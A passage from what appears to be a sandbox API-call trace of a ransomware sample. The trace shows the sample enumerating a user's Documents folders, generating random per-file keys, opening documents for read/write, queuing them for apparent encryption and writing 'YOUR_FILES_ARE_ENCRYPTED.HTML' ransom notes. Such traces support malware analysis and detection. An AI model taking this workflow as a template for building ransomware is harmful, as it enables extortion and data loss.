hFile=0x32c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0124.317] CloseHandle (hObject=0x32c) returned 1 [0124.317] GetProcessHeap () returned 0x600000 [0124.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.317] GetProcessHeap () returned 0x600000 [0124.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.317] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6960f450, ftCreationTime.dwHighDateTime=0x1d707ac, ftLastAccessTime.dwLowDateTime=0xc4e49e90, ftLastAccessTime.dwHighDateTime=0x1d70a44, ftLastWriteTime.dwLowDateTime=0xc4e49e90, ftLastWriteTime.dwHighDateTime=0x1d70a44, nFileSizeHigh=0x0, nFileSizeLow=0x18d60, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="ATxFJk3FL.pps", cAlternateFileName="ATXFJK~1.PPS")) returned 1 [0124.317] StrStrIW (lpFirst="ATxFJk3FL.pps", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.317] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps") returned 49 [0124.317] PathFindExtensionW (pszPath="ATxFJk3FL.pps") returned=".pps" [0124.317] lstrlenW (lpString=".pps") returned 4 [0124.317] PathFindExtensionW (pszPath="ATxFJk3FL.pps") returned=".pps" [0124.317] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\atxfjk3fl.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.318] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=101728) returned 1 [0124.318] GetProcessHeap () returned 0x600000 [0124.318] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.319] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="31") returned 2 [0124.319] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="0E") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="7D") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="DC") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="85") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C8") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="03") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="6B") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="FB") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="6A") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="32") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="BD") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="4E") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="BA") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="75") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="02") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="55") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="D6") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="96") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="90") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="58") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="0E") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="49") returned 2 [0124.319] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="7F") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="A2") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="A0") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="72") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="33") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="CD") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="7B") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="99") returned 2 [0124.320] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5B") returned 2 [0124.321] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ATxFJk3FL.pps" [0124.321] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.321] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.324] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4372e947, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.324] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.324] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini") returned 47 [0124.324] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.326] lstrlenW (lpString=".ini") returned 4 [0124.326] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.326] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.327] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=402) returned 1 [0124.327] CloseHandle (hObject=0x32c) returned 1 [0124.327] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6568160, ftCreationTime.dwHighDateTime=0x1d70872, ftLastAccessTime.dwLowDateTime=0xe593e90, ftLastAccessTime.dwHighDateTime=0x1d709fb, ftLastWriteTime.dwLowDateTime=0xe593e90, ftLastWriteTime.dwHighDateTime=0x1d709fb, nFileSizeHigh=0x0, nFileSizeLow=0x2a3c, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="eYykRCyWH51tSgkm MQl.ots", cAlternateFileName="EYYKRC~1.OTS")) returned 1 [0124.327] StrStrIW (lpFirst="eYykRCyWH51tSgkm MQl.ots", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.327] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\eYykRCyWH51tSgkm MQl.ots") returned 60 [0124.327] PathFindExtensionW (pszPath="eYykRCyWH51tSgkm MQl.ots") returned=".ots" [0124.327] lstrlenW (lpString=".ots") returned 4 [0124.327] PathFindExtensionW (pszPath="eYykRCyWH51tSgkm MQl.ots") returned=".ots" [0124.327] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb63b62a0, ftCreationTime.dwHighDateTime=0x1d6fc40, ftLastAccessTime.dwLowDateTime=0x6c8a5d70, ftLastAccessTime.dwHighDateTime=0x1d70670, ftLastWriteTime.dwLowDateTime=0x6c8a5d70, ftLastWriteTime.dwHighDateTime=0x1d70670, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="GWGjebB7QHWG5AdCuBU", cAlternateFileName="GWGJEB~1")) returned 1 [0124.327] StrStrIW (lpFirst="GWGjebB7QHWG5AdCuBU", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.327] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU") returned 55 [0124.327] GetProcessHeap () returned 0x600000 [0124.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.327] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU" [0124.327] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\*" [0124.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb63b62a0, ftCreationTime.dwHighDateTime=0x1d6fc40, ftLastAccessTime.dwLowDateTime=0x6c8a5d70, ftLastAccessTime.dwHighDateTime=0x1d70670, ftLastWriteTime.dwLowDateTime=0x6c8a5d70, ftLastWriteTime.dwHighDateTime=0x1d70670, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0124.328] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb63b62a0, ftCreationTime.dwHighDateTime=0x1d6fc40, ftLastAccessTime.dwLowDateTime=0x6c8a5d70, ftLastAccessTime.dwHighDateTime=0x1d70670, ftLastWriteTime.dwLowDateTime=0x6c8a5d70, ftLastWriteTime.dwHighDateTime=0x1d70670, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0124.328] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf00710, ftCreationTime.dwHighDateTime=0x1d6fd9b, ftLastAccessTime.dwLowDateTime=0x3316ac00, ftLastAccessTime.dwHighDateTime=0x1d70469, ftLastWriteTime.dwLowDateTime=0x3316ac00, ftLastWriteTime.dwHighDateTime=0x1d70469, nFileSizeHigh=0x0, nFileSizeLow=0x9dfb, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="hE0 RR3T.csv", cAlternateFileName="HE0RR3~1.CSV")) returned 1 [0124.328] StrStrIW (lpFirst="hE0 RR3T.csv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.328] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv") returned 68 [0124.328] PathFindExtensionW (pszPath="hE0 RR3T.csv") returned=".csv" [0124.328] lstrlenW (lpString=".csv") returned 4 [0124.328] PathFindExtensionW (pszPath="hE0 RR3T.csv") returned=".csv" [0124.328] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gwgjebb7qhwg5adcubu\\he0 rr3t.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.340] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=40443) returned 1 [0124.340] GetProcessHeap () returned 0x600000 [0124.340] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.343] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="94") returned 2 [0124.343] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="09") returned 2 [0124.343] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="5C") returned 2 [0124.343] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C0") returned 2 [0124.343] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="8D") returned 2 [0124.343] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="FA") returned 2 [0124.343] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="CF") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="10") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="6F") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2E") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="13") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="15") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="15") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="CB") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="9F") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="AF") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="75") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="40") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="A8") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="0C") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="56") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9E") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="7C") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="79") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="C5") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="E5") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="A1") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="02") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="FE") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="CC") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="EE") returned 2 [0124.343] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="13") returned 2 [0124.344] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\hE0 RR3T.csv" [0124.344] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.344] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f14110, ftCreationTime.dwHighDateTime=0x1d6fcc2, ftLastAccessTime.dwLowDateTime=0x4c0967b0, ftLastAccessTime.dwHighDateTime=0x1d7032f, ftLastWriteTime.dwLowDateTime=0x4c0967b0, ftLastWriteTime.dwHighDateTime=0x1d7032f, nFileSizeHigh=0x0, nFileSizeLow=0x176df, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Ieqr.ots", cAlternateFileName="")) returned 1 [0124.347] StrStrIW (lpFirst="Ieqr.ots", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.347] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\Ieqr.ots") returned 64 [0124.347] PathFindExtensionW (pszPath="Ieqr.ots") returned=".ots" [0124.347] lstrlenW (lpString=".ots") returned 4 [0124.347] PathFindExtensionW (pszPath="Ieqr.ots") returned=".ots" [0124.347] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fcf73f0, ftCreationTime.dwHighDateTime=0x1d6fc03, ftLastAccessTime.dwLowDateTime=0x63ab3b80, ftLastAccessTime.dwHighDateTime=0x1d702c8, ftLastWriteTime.dwLowDateTime=0x63ab3b80, ftLastWriteTime.dwHighDateTime=0x1d702c8, nFileSizeHigh=0x0, nFileSizeLow=0x147bf, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="jIxbGzT PVemDh0y5bdY.pdf", cAlternateFileName="JIXBGZ~1.PDF")) returned 1 [0124.347] StrStrIW (lpFirst="jIxbGzT PVemDh0y5bdY.pdf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.347] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf") returned 80 [0124.347] PathFindExtensionW (pszPath="jIxbGzT PVemDh0y5bdY.pdf") returned=".pdf" [0124.348] lstrlenW (lpString=".pdf") returned 4 [0124.348] PathFindExtensionW (pszPath="jIxbGzT PVemDh0y5bdY.pdf") returned=".pdf" [0124.348] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gwgjebb7qhwg5adcubu\\jixbgzt pvemdh0y5bdy.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.348] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=83903) returned 1 [0124.348] GetProcessHeap () returned 0x600000 [0124.348] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.349] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="9C") returned 2 [0124.349] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="5D") returned 2 [0124.349] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="74") returned 2 [0124.349] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="BF") returned 2 [0124.349] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="5C") returned 2 [0124.349] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="D5") returned 2 [0124.349] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="14") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="5E") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="01") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2D") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="06") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="BC") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="B1") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="72") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="F1") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="C7") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="3E") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="57") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="4B") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="FA") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="F0") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="43") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="95") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="16") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="59") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="F7") returned 2 [0124.349] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E8") returned 2 [0124.350] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="EF") returned 2 [0124.350] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3F") returned 2 [0124.350] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="C3") returned 2 [0124.350] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="7F") returned 2 [0124.350] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="07") returned 2 [0124.350] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\jIxbGzT PVemDh0y5bdY.pdf" [0124.350] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.350] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.353] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fcf73f0, ftCreationTime.dwHighDateTime=0x1d6fc03, ftLastAccessTime.dwLowDateTime=0x63ab3b80, ftLastAccessTime.dwHighDateTime=0x1d702c8, ftLastWriteTime.dwLowDateTime=0x63ab3b80, ftLastWriteTime.dwHighDateTime=0x1d702c8, nFileSizeHigh=0x0, nFileSizeLow=0x147bf, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="jIxbGzT PVemDh0y5bdY.pdf", cAlternateFileName="JIXBGZ~1.PDF")) returned 0 [0124.353] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0124.353] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0124.353] GetProcessHeap () returned 0x600000 [0124.353] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GWGjebB7QHWG5AdCuBU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gwgjebb7qhwg5adcubu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0124.354] WriteFile (in: hFile=0x32c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0124.355] CloseHandle (hObject=0x32c) returned 1 [0124.355] GetProcessHeap () returned 0x600000 [0124.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.356] GetProcessHeap () returned 0x600000 [0124.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.357] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb0335f0, ftCreationTime.dwHighDateTime=0x1d70257, ftLastAccessTime.dwLowDateTime=0x1240f840, ftLastAccessTime.dwHighDateTime=0x1d70a78, ftLastWriteTime.dwLowDateTime=0x1240f840, ftLastWriteTime.dwHighDateTime=0x1d70a78, nFileSizeHigh=0x0, nFileSizeLow=0xb687, 